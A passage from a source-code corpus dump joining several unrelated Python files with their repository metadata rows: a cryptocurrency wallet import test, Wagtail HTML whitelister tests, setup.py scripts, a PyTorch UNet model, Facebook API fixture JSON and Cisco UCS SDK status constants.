assert("Invalid or non-wallet transaction id" not in e.error['message'])
sync_blocks(self.nodes)
# test multiple private key import, and watch only address import
bal = self.nodes[2].getbalance()
addrs = [ self.nodes[1].getnewaddress() for i in range(0,21)]
pks = [ self.nodes[1].dumpprivkey(x) for x in addrs]
for a in addrs:
self.nodes[0].sendtoaddress(a, 1)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
self.nodes[2].importprivatekeys(pks[0], pks[1])
waitForRescan(self.nodes[2])
assert(bal + 2 == self.nodes[2].getbalance())
self.nodes[2].importprivatekeys("rescan", pks[2], pks[3])
waitForRescan(self.nodes[2])
assert(bal + 4 == self.nodes[2].getbalance())
self.nodes[2].importprivatekeys("no-rescan", pks[4], pks[5])
time.sleep(1)
assert(bal + 4 == self.nodes[2].getbalance()) # since the recan didn't happen, there won't be a balance change
self.nodes[2].importaddresses("rescan") # force a rescan although we imported nothing
waitForRescan(self.nodes[2])
assert(bal + 6 == self.nodes[2].getbalance())
# import 5 addresses each (bug fix check)
self.nodes[2].importaddresses(addrs[6], addrs[7], addrs[8], addrs[9], addrs[10]) # import watch only addresses
waitForRescan(self.nodes[2])
assert(bal + 6 == self.nodes[2].getbalance()) # since watch only, won't show in balance
assert(bal + 11 == self.nodes[2].getbalance("*",1,True)) # show the full balance
self.nodes[2].importaddresses("rescan", addrs[11], addrs[12], addrs[13], addrs[14], addrs[15]) # import watch only addresses
waitForRescan(self.nodes[2])
assert(bal + 6 == self.nodes[2].getbalance()) # since watch only, won't show in balance
assert(bal + 16 == self.nodes[2].getbalance("*",1,True)) # show the full balance
self.nodes[2].importaddresses("no-rescan", addrs[16], addrs[17], addrs[18], addrs[19], addrs[20]) # import watch only addresses
time.sleep(1)
assert(bal + 6 == self.nodes[2].getbalance()) # since watch only, won't show in balance
assert(bal + 16 == self.nodes[2].getbalance("*",1,True)) # show the full balance, will be same because no rescan
self.nodes[2].importaddresses("rescan") # force a rescan although we imported nothing
waitForRescan(self.nodes[2])
assert(bal + 21 == self.nodes[2].getbalance("*",1,True)) # show the full balance
# verify that none of the importaddress calls added the address with a label (bug fix check)
txns = self.nodes[2].listreceivedbyaddress(0, True, True)
for i in range(6,21):
assert_array_result(txns,
{"address": addrs[i]},
{"label": ""})
# now try P2SH
lcsAddress = self.nodes[1].getnewaddress()
lcsAddress = self.nodes[1].getaddressforms(lcsAddress)["legacy"]
( p2shAddress, redeemScript) = GenerateSingleSigP2SH(lcsAddress)
self.nodes[0].sendtoaddress(p2shAddress,1)
lcsAddress2 = self.nodes[1].getnewaddress()
lcsAddress2 = self.nodes[1].getaddressforms(lcsAddress2)["legacy"]
( p2shAddress2, redeemScript2) = GenerateSingleSigP2SH(lcsAddress2)
self.nodes[0].sendtoaddress(p2shAddress2,1)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
bal1 = self.nodes[2].getbalance('*', 1, True)
self.nodes[2].importaddresses(hexlify(redeemScript).decode("ascii"),hexlify(redeemScript2).decode("ascii"))
waitForRescan(self.nodes[2])
bal2 = self.nodes[2].getbalance('*', 1, True)
assert_equal(bal1 + 2, bal2)
# verify that none of the importaddress calls added the address with a label (bug fix check)
txns = self.nodes[2].listreceivedbyaddress(0, True, True)
assert_array_result(txns,
{"address": self.nodes[2].getaddressforms(p2shAddress)["lkcoinsecash"]},
{"label": ""})
assert_array_result(txns,
{"address": self.nodes[2].getaddressforms(p2shAddress2)["lkcoinsecash"]},
{"label": ""})
#check if wallet or blochchain maintenance changes the balance
self.sync_all()
blocks = self.nodes[0].generate(2)
self.sync_all()
balance_nodes = [self.nodes[i].getbalance() for i in range(3)]
block_count = self.nodes[0].getblockcount()
# Check modes:
# - True: unicode escaped as \u....
# - False: unicode directly as UTF-8
for mode in [True, False]:
self.nodes[0].ensure_ascii = mode
# unicode check: Basic Multilingual Plane, Supplementary Plane respectively
for s in [u'рыба', u'𝅘𝅥𝅯']:
addr = self.nodes[0].getaccountaddress(s)
label = self.nodes[0].getaccount(addr)
assert_equal(label, s)
assert(s in self.nodes[0].listaccounts().keys())
self.nodes[0].ensure_ascii = True # restore to default
# maintenance tests
maintenance = [
'-rescan',
'-reindex',
'-zapwallettxes=1',
'-zapwallettxes=2',
'-salvagewallet',
]
for m in maintenance:
logging.info("check " + m)
stop_nodes(self.nodes)
wait_lkcoinseds()
self.node_args = [['-usehd=0'], ['-usehd=0'], ['-usehd=0']]
self.nodes = start_nodes(3, self.options.tmpdir, self.node_args)
while m == '-reindex' and [block_count] * 3 != [self.nodes[i].getblockcount() for i in range(3)]:
# reindex will leave rpc warm up "early"; Wait for it to finish
time.sleep(0.1)
assert_equal(balance_nodes, [self.nodes[i].getbalance() for i in range(3)])
# Exercise listsinceblock with the last two blocks
coinbase_tx_1 = self.nodes[0].listsinceblock(blocks[0])
assert_equal(coinbase_tx_1["lastblock"], blocks[1])
assert_equal(len(coinbase_tx_1["transactions"]), 1)
assert_equal(coinbase_tx_1["transactions"][0]["blockhash"], blocks[1])
assert_equal(coinbase_tx_1["transactions"][0]["satoshi"], Decimal('2500000000'))
assert_equal(len(self.nodes[0].listsinceblock(blocks[1])["transactions"]), 0)
if __name__ == '__main__':
WalletTest ().main ()
def Test():
t = WalletTest()
lkcoinseConf = {
"debug": ["net", "blk", "thin", "mempool", "req", "bench", "evict"], # "lck"
"blockprioritysize": 2000000 # we don't want any transactions rejected due to insufficient fees...
}
# "--tmpdir=/ramdisk/test", "--srcdir=../../debug/src"
t.main(["--nocleanup", "--noshutdown"], lkcoinseConf, None)
| 45.802083 | 164 | 0.632659 |
795b9637c04ad2e9b60b6859781d50c72311451d | 3,847 | py | Python | wagtail/wagtailcore/tests/test_dbwhitelister.py | lojack/wagtail | eaf61d5550795a3278184261f6f956f603df8d46 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/tests/test_dbwhitelister.py | lojack/wagtail | eaf61d5550795a3278184261f6f956f603df8d46 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/tests/test_dbwhitelister.py | lojack/wagtail | eaf61d5550795a3278184261f6f956f603df8d46 | [
"BSD-3-Clause"
] | null | null | null | from django.test import TestCase
from wagtail.wagtailcore.rich_text import DbWhitelister
from wagtail.wagtailcore.whitelist import Whitelister
from bs4 import BeautifulSoup
class TestDbWhitelister(TestCase):
def assertHtmlEqual(self, str1, str2):
"""
Assert that two HTML strings are equal at the DOM level
(necessary because we can't guarantee the order that attributes are output in)
"""
self.assertEqual(BeautifulSoup(str1), BeautifulSoup(str2))
def test_page_link_is_rewritten(self):
input_html = '<p>Look at the <a data-linktype="page" data-id="2" href="/">lovely homepage</a> of my <a href="http://wagtail.io/">Wagtail</a> site</p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>Look at the <a linktype="page" id="2">lovely homepage</a> of my <a href="http://wagtail.io/">Wagtail</a> site</p>'
self.assertHtmlEqual(expected, output_html)
def test_document_link_is_rewritten(self):
input_html = '<p>Look at our <a data-linktype="document" data-id="1" href="/documents/1/brochure.pdf">horribly oversized brochure</a></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>Look at our <a linktype="document" id="1">horribly oversized brochure</a></p>'
self.assertHtmlEqual(expected, output_html)
def test_image_embed_is_rewritten(self):
input_html = '<p>OMG look at this picture of a kitten: <figure data-embedtype="image" data-id="5" data-format="image-with-caption" data-alt="A cute kitten" class="fancy-image"><img src="/media/images/kitten.jpg" width="320" height="200" alt="A cute kitten" /><figcaption>A kitten, yesterday.</figcaption></figure></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>OMG look at this picture of a kitten: <embed embedtype="image" id="5" format="image-with-caption" alt="A cute kitten" /></p>'
self.assertHtmlEqual(expected, output_html)
def test_media_embed_is_rewritten(self):
input_html = '<p>OMG look at this video of a kitten: <iframe data-embedtype="media" data-url="https://www.youtube.com/watch?v=dQw4w9WgXcQ" width="640" height="480" src="//www.youtube.com/embed/dQw4w9WgXcQ" frameborder="0" allowfullscreen></iframe></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>OMG look at this video of a kitten: <embed embedtype="media" url="https://www.youtube.com/watch?v=dQw4w9WgXcQ" /></p>'
self.assertHtmlEqual(expected, output_html)
def test_whitelist_hooks(self):
# wagtail.tests.wagtail_hooks overrides the whitelist to permit <blockquote> and <a target="...">
input_html = '<blockquote>I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1" target="_blank" tea="darjeeling">stand in water</a>.</blockquote><p>- <character>Gumby</character></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<blockquote>I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1" target="_blank">stand in water</a>.</blockquote><p>- Gumby</p>'
self.assertHtmlEqual(expected, output_html)
# check that the base Whitelister class is unaffected by these custom whitelist rules
input_html = '<blockquote>I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1" target="_blank" tea="darjeeling">stand in water</a>.</blockquote><p>- <character>Gumby</character></p>'
output_html = Whitelister.clean(input_html)
expected = 'I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1">stand in water</a>.<p>- Gumby</p>'
self.assertHtmlEqual(expected, output_html)
| 75.431373 | 326 | 0.707824 |
795b965beca6ef8b993a4c5b0802fc81010eecc6 | 1,955 | py | Python | setup.py | aaronbiller/spackl | 71906a3da6470f67bff19c42bd0f1f8748c5056f | [
"MIT"
] | null | null | null | setup.py | aaronbiller/spackl | 71906a3da6470f67bff19c42bd0f1f8748c5056f | [
"MIT"
] | null | null | null | setup.py | aaronbiller/spackl | 71906a3da6470f67bff19c42bd0f1f8748c5056f | [
"MIT"
] | null | null | null | import re
from io import open
from setuptools import setup, find_packages
README = 'README.md'
CHANGES = 'CHANGES.md'
VERSION_FILE = 'spackl/__init__.py'
def read(path):
with open(path, encoding='utf-8') as f:
return f.read()
def find_version():
version_file = read(VERSION_FILE)
version_match = re.search(
r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file,
re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='spackl',
version=find_version(),
author='Aaron Biller',
author_email='aaronbiller@gmail.com',
description='Utility for unified querying across data sources',
long_description=read(README) + '\n' + read(CHANGES),
long_description_content_type='text/markdown',
license='MIT',
keywords='utility query database csv file',
url='https://github.com/aaronbiller/spackl',
packages=find_packages(),
tests_require=[
'pytest',
'pytest-cov',
'mock',
],
install_requires=[
'future==0.16.0',
'google-cloud-bigquery==1.5.0',
'psycopg2-binary==2.7.5',
'PyYAML',
'SQLAlchemy==1.2.11',
'sqlalchemy-redshift==0.7.1',
'pandas>=0.22.0',
'pytest-runner==4.2',
],
extras_require={
':python_version == "2.7"': [
'pathlib2==2.3.2',
],
},
include_package_data=True,
scripts=[],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Database',
'Topic :: Utilities',
],
)
| 26.066667 | 67 | 0.582097 |
795b96adabb64d1e14a3cff35e3c25886eb06aac | 712 | py | Python | setup.py | neurospin/deep_folding | 4c580314dfa4ae87c5d115f211c42185ae183f64 | [
"CECILL-B"
] | 1 | 2021-10-06T06:47:53.000Z | 2021-10-06T06:47:53.000Z | setup.py | neurospin/deep_folding | 4c580314dfa4ae87c5d115f211c42185ae183f64 | [
"CECILL-B"
] | 5 | 2021-04-19T07:12:33.000Z | 2022-01-14T14:53:22.000Z | setup.py | neurospin/deep_folding | 4c580314dfa4ae87c5d115f211c42185ae183f64 | [
"CECILL-B"
] | 2 | 2021-09-09T11:39:08.000Z | 2021-09-09T12:29:34.000Z | import os
from setuptools import setup, find_packages
release_info = {}
python_dir = os.path.dirname(__file__)
with open(os.path.join(python_dir, "deep_folding", "info.py")) as f:
code = f.read()
exec(code, release_info)
setup(
name=release_info['NAME'],
version=release_info['__version__'],
packages=find_packages(exclude=['tests*', 'notebooks*']),
license=release_info['LICENSE'],
description=release_info['DESCRIPTION'],
long_description=open('README.rst').read(),
install_requires=release_info["REQUIRES"],
extras_require=release_info["EXTRA_REQUIRES"],
url=release_info['URL'],
author=release_info['AUTHOR'],
author_email=release_info['AUTHOR_EMAIL']
)
| 30.956522 | 68 | 0.717697 |
795b980937c88934f44a01a256940bf5374f04ab | 370 | py | Python | thermosteam/equilibrium/ideal.py | yoelcortes/thermotree | 7d7c045ed7324ff7fd69188f3176207be08d7070 | [
"MIT"
] | 2 | 2020-01-10T14:23:08.000Z | 2020-02-21T20:36:49.000Z | thermosteam/equilibrium/ideal.py | yoelcortes/thermotree | 7d7c045ed7324ff7fd69188f3176207be08d7070 | [
"MIT"
] | 3 | 2019-12-09T08:10:41.000Z | 2019-12-09T08:40:52.000Z | thermosteam/equilibrium/ideal.py | yoelcortes/thermotree | 7d7c045ed7324ff7fd69188f3176207be08d7070 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 29 08:43:40 2021
@author: yrc2
"""
from numba import njit
__all__ = ('ideal_coefficient',)
def ideal(cls):
cls.f = ideal_coefficient
cls.args = ()
return cls
@property
def ideal_coefficient(self):
return _ideal_coefficient
@njit(cache=True)
def _ideal_coefficient(z=None, T=None, P=None):
return 1. | 16.818182 | 47 | 0.675676 |
795b983029de527b4d18fc59e6ae285d2b68ce73 | 1,643 | py | Python | Maria/federated_segmentation_unet_pneumo/model.py | anirbansen3027/UdacityOpenSource | c032f610a7861c234e189841f996bff877c94e34 | [
"Apache-2.0"
] | 2 | 2019-08-19T19:16:59.000Z | 2020-09-03T19:18:27.000Z | Maria/federated_segmentation_unet_pneumo/model.py | anirbansen3027/UdacityOpenSource | c032f610a7861c234e189841f996bff877c94e34 | [
"Apache-2.0"
] | null | null | null | Maria/federated_segmentation_unet_pneumo/model.py | anirbansen3027/UdacityOpenSource | c032f610a7861c234e189841f996bff877c94e34 | [
"Apache-2.0"
] | 1 | 2019-08-20T13:14:59.000Z | 2019-08-20T13:14:59.000Z | # https://github.com/usuyama/pytorch-unet
import torch
from torch import nn
def double_conv(in_channels, out_channels):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, 3, padding=1),
nn.ReLU(inplace=True)
)
class UNet(nn.Module):
def __init__(self, n_class):
super().__init__()
self.dconv_down1 = double_conv(3, 64)
self.dconv_down2 = double_conv(64, 128)
self.dconv_down3 = double_conv(128, 256)
self.dconv_down4 = double_conv(256, 512)
self.maxpool = nn.MaxPool2d(2)
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
self.dconv_up3 = double_conv(256 + 512, 256)
self.dconv_up2 = double_conv(128 + 256, 128)
self.dconv_up1 = double_conv(128 + 64, 64)
self.conv_last = nn.Conv2d(64, n_class, 1)
def forward(self, x):
conv1 = self.dconv_down1(x)
x = self.maxpool(conv1)
conv2 = self.dconv_down2(x)
x = self.maxpool(conv2)
conv3 = self.dconv_down3(x)
x = self.maxpool(conv3)
x = self.dconv_down4(x)
x = self.upsample(x)
x = torch.cat([x, conv3], dim=1)
x = self.dconv_up3(x)
x = self.upsample(x)
x = torch.cat([x, conv2], dim=1)
x = self.dconv_up2(x)
x = self.upsample(x)
x = torch.cat([x, conv1], dim=1)
x = self.dconv_up1(x)
out = self.conv_last(x)
return out | 34.229167 | 92 | 0.570298 |
795b98a5af239e4c9c124fb4c6d75935151d2f06 | 4,416 | py | Python | tests/data/until_12_999.py | GTmmiller/TurkeyVulture | 4481d04d0e210b6058573afdacc2c089ed8bbeb5 | [
"Apache-2.0"
] | null | null | null | tests/data/until_12_999.py | GTmmiller/TurkeyVulture | 4481d04d0e210b6058573afdacc2c089ed8bbeb5 | [
"Apache-2.0"
] | null | null | null | tests/data/until_12_999.py | GTmmiller/TurkeyVulture | 4481d04d0e210b6058573afdacc2c089ed8bbeb5 | [
"Apache-2.0"
] | null | null | null | JSON = {
"id": "999",
"to": {
"data": [
{
"id": "1",
"name": "Person One"
},
{
"id": "2",
"name": "Person Two"
},
{
"id": "3",
"name": "Person Three"
},
{
"id": "4",
"name": "Person Four"
},
{
"id": "5",
"name": "Person Five"
},
{
"id": "6",
"name": "Person Six"
},
{
"id": "7",
"name": "Person Seven"
},
{
"id": "8",
"name": "Person Eight"
}
]
},
"updated_time": "2010-01-23T14:00:00+0000",
"unread": 0,
"unseen": 0,
"comments": {
"data": [
{
"id": "999_1",
"from": {
"id": "8",
"name": "Person Eight"
},
"message": "Sed aliquam ultrices mauris.",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_2",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Duis arcu tortor, suscipit eget, imperdiet nec, imperdiet iaculis, ipsum",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_3",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Nam pretium turpis et arcu",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_4",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; In ac dui quis mi consectetuer lacinia",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_5",
"from": {
"id": "2",
"name": "Person Two"
},
"message": "Cras ultricies mi eu turpis hendrerit fringilla",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_6",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Nullam accumsan lorem in dui.",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_7",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Vestibulum purus quam, scelerisque ut, mollis sed, nonummy id, metus",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_8",
"from": {
"id": "7",
"name": "Person Seven"
},
"message": "Fusce vulputate eleifend sapien",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_9",
"from": {
"id": "2",
"name": "Person Two"
},
"message": "Sed consequat, leo eget bibendum sodales, augue velit cursus nunc, quis gravida magna mi a libero",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_10",
"from": {
"id": "5",
"name": "Person Five"
},
"message": "Donec sodales sagittis magna",
"created_time": "2010-01-23T14:00:00+0000"
},
{
"id": "999_11",
"from": {
"id": "3",
"name": "Person 3"
},
"message": "Sed fringilla mauris sit amet nibh",
"created_time": "2010-01-23T14:00:00+0000"
}
],
"paging": {
"previous": "https://graph.facebook.com/v2.3/999/comments?limit=25&__paging_token=enc_ABC123PLACeHolDer&access_token=placeholder&since=11&__previous=1",
"next": "https://graph.facebook.com/v2.3/999/comments?limit=25&__paging_token=enc_AxccviosOthErPLaCEHoLDer&access_token=placeholder&until=1"
}
}
} | 29.637584 | 162 | 0.380208 |
795b98d54c49199771ccdbd82ce39b2ffac54da8 | 18,776 | py | Python | ucsmsdk/mometa/equipment/EquipmentSwitchIOCardFsm.py | Curlyfingers/ucsmsdk | 982ff2d8faa12ffb88e1f8cba98cf5749f05c93d | [
"Apache-2.0"
] | null | null | null | ucsmsdk/mometa/equipment/EquipmentSwitchIOCardFsm.py | Curlyfingers/ucsmsdk | 982ff2d8faa12ffb88e1f8cba98cf5749f05c93d | [
"Apache-2.0"
] | null | null | null | ucsmsdk/mometa/equipment/EquipmentSwitchIOCardFsm.py | Curlyfingers/ucsmsdk | 982ff2d8faa12ffb88e1f8cba98cf5749f05c93d | [
"Apache-2.0"
] | null | null | null | """This module contains the general information for EquipmentSwitchIOCardFsm ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentSwitchIOCardFsmConsts:
COMPLETION_TIME_ = ""
CURRENT_FSM_EVACUATE = "Evacuate"
CURRENT_FSM_FE_CONN = "FeConn"
CURRENT_FSM_FE_PRESENCE = "FePresence"
CURRENT_FSM_RESET_EVACUATE = "ResetEvacuate"
CURRENT_FSM_NOP = "nop"
FSM_STATUS_FAIL = "fail"
FSM_STATUS_IN_PROGRESS = "inProgress"
FSM_STATUS_NOP = "nop"
FSM_STATUS_PENDING = "pending"
FSM_STATUS_SKIP = "skip"
FSM_STATUS_SUCCESS = "success"
FSM_STATUS_THROTTLED = "throttled"
RMT_ERR_CODE_ERR_2FA_AUTH_RETRY = "ERR-2fa-auth-retry"
RMT_ERR_CODE_ERR_ACTIVATE_FAILED = "ERR-ACTIVATE-failed"
RMT_ERR_CODE_ERR_ACTIVATE_IN_PROGRESS = "ERR-ACTIVATE-in-progress"
RMT_ERR_CODE_ERR_ACTIVATE_RETRY = "ERR-ACTIVATE-retry"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_BIOS = "ERR-BIOS-TOKENS-OLD-BIOS"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_CIMC = "ERR-BIOS-TOKENS-OLD-CIMC"
RMT_ERR_CODE_ERR_BIOS_NETWORK_BOOT_ORDER_NOT_FOUND = "ERR-BIOS-network-boot-order-not-found"
RMT_ERR_CODE_ERR_BOARDCTRLUPDATE_IGNORE = "ERR-BOARDCTRLUPDATE-ignore"
RMT_ERR_CODE_ERR_DIAG_CANCELLED = "ERR-DIAG-cancelled"
RMT_ERR_CODE_ERR_DIAG_FSM_RESTARTED = "ERR-DIAG-fsm-restarted"
RMT_ERR_CODE_ERR_DIAG_TEST_FAILED = "ERR-DIAG-test-failed"
RMT_ERR_CODE_ERR_DNLD_AUTHENTICATION_FAILURE = "ERR-DNLD-authentication-failure"
RMT_ERR_CODE_ERR_DNLD_HOSTKEY_MISMATCH = "ERR-DNLD-hostkey-mismatch"
RMT_ERR_CODE_ERR_DNLD_INVALID_IMAGE = "ERR-DNLD-invalid-image"
RMT_ERR_CODE_ERR_DNLD_NO_FILE = "ERR-DNLD-no-file"
RMT_ERR_CODE_ERR_DNLD_NO_SPACE = "ERR-DNLD-no-space"
RMT_ERR_CODE_ERR_DNLD_USB_UNMOUNTED = "ERR-DNLD-usb-unmounted"
RMT_ERR_CODE_ERR_DNS_DELETE_ERROR = "ERR-DNS-delete-error"
RMT_ERR_CODE_ERR_DNS_GET_ERROR = "ERR-DNS-get-error"
RMT_ERR_CODE_ERR_DNS_SET_ERROR = "ERR-DNS-set-error"
RMT_ERR_CODE_ERR_DIAGNOSTICS_IN_PROGRESS = "ERR-Diagnostics-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_MEMTEST_IN_PROGRESS = "ERR-Diagnostics-memtest-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_NETWORK_IN_PROGRESS = "ERR-Diagnostics-network-in-progress"
RMT_ERR_CODE_ERR_FILTER_ILLEGAL_FORMAT = "ERR-FILTER-illegal-format"
RMT_ERR_CODE_ERR_FSM_NO_SUCH_STATE = "ERR-FSM-no-such-state"
RMT_ERR_CODE_ERR_HOST_FRU_IDENTITY_MISMATCH = "ERR-HOST-fru-identity-mismatch"
RMT_ERR_CODE_ERR_HTTP_SET_ERROR = "ERR-HTTP-set-error"
RMT_ERR_CODE_ERR_HTTPS_SET_ERROR = "ERR-HTTPS-set-error"
RMT_ERR_CODE_ERR_IBMC_ANALYZE_RESULTS = "ERR-IBMC-analyze-results"
RMT_ERR_CODE_ERR_IBMC_CONNECT_ERROR = "ERR-IBMC-connect-error"
RMT_ERR_CODE_ERR_IBMC_CONNECTOR_INFO_RETRIEVAL_ERROR = "ERR-IBMC-connector-info-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_FRU_RETRIEVAL_ERROR = "ERR-IBMC-fru-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_INVALID_END_POINT_CONFIG = "ERR-IBMC-invalid-end-point-config"
RMT_ERR_CODE_ERR_IBMC_RESULTS_NOT_READY = "ERR-IBMC-results-not-ready"
RMT_ERR_CODE_ERR_MAX_SUBSCRIPTIONS_ALLOWED_ERROR = "ERR-MAX-subscriptions-allowed-error"
RMT_ERR_CODE_ERR_MO_CONFIG_CHILD_OBJECT_CANT_BE_CONFIGURED = "ERR-MO-CONFIG-child-object-cant-be-configured"
RMT_ERR_CODE_ERR_MO_META_NO_SUCH_OBJECT_CLASS = "ERR-MO-META-no-such-object-class"
RMT_ERR_CODE_ERR_MO_PROPERTY_NO_SUCH_PROPERTY = "ERR-MO-PROPERTY-no-such-property"
RMT_ERR_CODE_ERR_MO_PROPERTY_VALUE_OUT_OF_RANGE = "ERR-MO-PROPERTY-value-out-of-range"
RMT_ERR_CODE_ERR_MO_ACCESS_DENIED = "ERR-MO-access-denied"
RMT_ERR_CODE_ERR_MO_DELETION_RULE_VIOLATION = "ERR-MO-deletion-rule-violation"
RMT_ERR_CODE_ERR_MO_DUPLICATE_OBJECT = "ERR-MO-duplicate-object"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CONTAINMENT = "ERR-MO-illegal-containment"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CREATION = "ERR-MO-illegal-creation"
RMT_ERR_CODE_ERR_MO_ILLEGAL_ITERATOR_STATE = "ERR-MO-illegal-iterator-state"
RMT_ERR_CODE_ERR_MO_ILLEGAL_OBJECT_LIFECYCLE_TRANSITION = "ERR-MO-illegal-object-lifecycle-transition"
RMT_ERR_CODE_ERR_MO_NAMING_RULE_VIOLATION = "ERR-MO-naming-rule-violation"
RMT_ERR_CODE_ERR_MO_OBJECT_NOT_FOUND = "ERR-MO-object-not-found"
RMT_ERR_CODE_ERR_MO_RESOURCE_ALLOCATION = "ERR-MO-resource-allocation"
RMT_ERR_CODE_ERR_NTP_DELETE_ERROR = "ERR-NTP-delete-error"
RMT_ERR_CODE_ERR_NTP_GET_ERROR = "ERR-NTP-get-error"
RMT_ERR_CODE_ERR_NTP_SET_ERROR = "ERR-NTP-set-error"
RMT_ERR_CODE_ERR_POWER_CAP_UNSUPPORTED = "ERR-POWER-CAP-UNSUPPORTED"
RMT_ERR_CODE_ERR_POWER_PROFILE_IN_PROGRESS = "ERR-POWER-PROFILE-IN-PROGRESS"
RMT_ERR_CODE_ERR_SERVER_MIS_CONNECT = "ERR-SERVER-mis-connect"
RMT_ERR_CODE_ERR_SWITCH_INVALID_IF_CONFIG = "ERR-SWITCH-invalid-if-config"
RMT_ERR_CODE_ERR_TOKEN_REQUEST_DENIED = "ERR-TOKEN-request-denied"
RMT_ERR_CODE_ERR_UNABLE_TO_FETCH_BIOS_SETTINGS = "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS"
RMT_ERR_CODE_ERR_UPDATE_FAILED = "ERR-UPDATE-failed"
RMT_ERR_CODE_ERR_UPDATE_IN_PROGRESS = "ERR-UPDATE-in-progress"
RMT_ERR_CODE_ERR_UPDATE_RETRY = "ERR-UPDATE-retry"
RMT_ERR_CODE_ERR_AAA_CONFIG_MODIFY_ERROR = "ERR-aaa-config-modify-error"
RMT_ERR_CODE_ERR_ACCT_REALM_SET_ERROR = "ERR-acct-realm-set-error"
RMT_ERR_CODE_ERR_ADMIN_PASSWD_SET = "ERR-admin-passwd-set"
RMT_ERR_CODE_ERR_AUTH_ISSUE = "ERR-auth-issue"
RMT_ERR_CODE_ERR_AUTH_REALM_GET_ERROR = "ERR-auth-realm-get-error"
RMT_ERR_CODE_ERR_AUTH_REALM_SET_ERROR = "ERR-auth-realm-set-error"
RMT_ERR_CODE_ERR_AUTHENTICATION = "ERR-authentication"
RMT_ERR_CODE_ERR_AUTHORIZATION_REQUIRED = "ERR-authorization-required"
RMT_ERR_CODE_ERR_CLI_SESSION_LIMIT_REACHED = "ERR-cli-session-limit-reached"
RMT_ERR_CODE_ERR_CREATE_KEYRING = "ERR-create-keyring"
RMT_ERR_CODE_ERR_CREATE_LOCALE = "ERR-create-locale"
RMT_ERR_CODE_ERR_CREATE_ROLE = "ERR-create-role"
RMT_ERR_CODE_ERR_CREATE_TP = "ERR-create-tp"
RMT_ERR_CODE_ERR_CREATE_USER = "ERR-create-user"
RMT_ERR_CODE_ERR_DELETE_LOCALE = "ERR-delete-locale"
RMT_ERR_CODE_ERR_DELETE_ROLE = "ERR-delete-role"
RMT_ERR_CODE_ERR_DELETE_SESSION = "ERR-delete-session"
RMT_ERR_CODE_ERR_DELETE_USER = "ERR-delete-user"
RMT_ERR_CODE_ERR_DOWNGRADE_FAIL = "ERR-downgrade-fail"
RMT_ERR_CODE_ERR_EFI_DIAGNOSTICS_IN_PROGRESS = "ERR-efi-Diagnostics--in-progress"
RMT_ERR_CODE_ERR_ENABLE_MGMT_CONN = "ERR-enable-mgmt-conn"
RMT_ERR_CODE_ERR_EP_SET_ERROR = "ERR-ep-set-error"
RMT_ERR_CODE_ERR_GET_MAX_HTTP_USER_SESSIONS = "ERR-get-max-http-user-sessions"
RMT_ERR_CODE_ERR_HTTP_INITIALIZING = "ERR-http-initializing"
RMT_ERR_CODE_ERR_INSUFFICIENTLY_EQUIPPED = "ERR-insufficiently-equipped"
RMT_ERR_CODE_ERR_INTERNAL_ERROR = "ERR-internal-error"
RMT_ERR_CODE_ERR_LDAP_DELETE_ERROR = "ERR-ldap-delete-error"
RMT_ERR_CODE_ERR_LDAP_GET_ERROR = "ERR-ldap-get-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_MODIFY_ERROR = "ERR-ldap-group-modify-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_SET_ERROR = "ERR-ldap-group-set-error"
RMT_ERR_CODE_ERR_LDAP_SET_ERROR = "ERR-ldap-set-error"
RMT_ERR_CODE_ERR_LOCALE_SET_ERROR = "ERR-locale-set-error"
